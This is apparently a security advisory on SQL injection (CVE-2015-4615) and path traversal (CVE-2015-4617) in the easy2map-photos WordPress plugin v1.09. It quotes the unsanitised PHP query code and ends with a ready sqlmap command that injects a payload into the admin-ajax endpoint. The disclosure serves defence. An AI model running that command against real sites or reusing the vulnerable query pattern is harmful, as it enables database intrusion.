Title:SQL Injection in easy2map-photos wordpress plugin v1.09
The following lines in Functions.php are vulnerable to SQL injection attack because they are not parameterized or sanitizing user input.

48         $wpdb->query(sprintf("UPDATE $mapsTable
49         SET PolyLines = '%s'
50         WHERE ID = '%s';", $PolyLines, $mapID));
218             $wpdb->query(sprintf("
219                 UPDATE $mapsTable
220                 SET TemplateID = '%s',
221                     MapName = '%s',
222                     Settings = '%s',
223                     CSSValues = '%s',
224                     CSSValuesPhoto = '%s',
225                     CSSValuesMap = '%s',
226                     MapHTML = '%s',
227                     IsActive = 1
228                 WHERE ID = %s;",
229                     $_REQUEST['mapTemplateName'],
230                     $_REQUEST['mapName'],
231                     urldecode($_REQUEST['mapSettingsXML']),
232                     urldecode($_REQUEST["parentCSSXML"]),
233                     urldecode($_REQUEST["photoCSSXML"]),
234                     urldecode($_REQUEST["mapCSSXML"]),
235                     urldecode($_REQUEST["mapHTML"]), $mapID));


238             //this is a map insert
239             if (!$wpdb->query(sprintf("
240             INSERT INTO $mapsTable(
241                 TemplateID,
242                 MapName,
243                 DefaultPinImage,
244                 Settings,
245                 LastInvoked,
246                 PolyLines,
247                 CSSValues,
248                 CSSValuesPhoto,
249                 CSSValuesMap,
250                 MapHTML,
251                 IsActive
252             ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'    , 0);",
253                     $_REQUEST['mapTemplateName'],
254                     $_REQUEST['mapName’]


331         $wpdb->query(sprintf("
332             UPDATE $mapsTable
333             SET MapName = '%s'
334             IsActive = 1
335             WHERE ID = %s;",
336                 $_REQUEST['mapName'],
337                 $mapID));

,
Also

In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:

   if (!file_exists($imagesDirectory)) {
       mkdir($imagesDirectory);
   }

CVE-2015-4615 SQL Injection
CVE-2015-4617 Path traversal$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3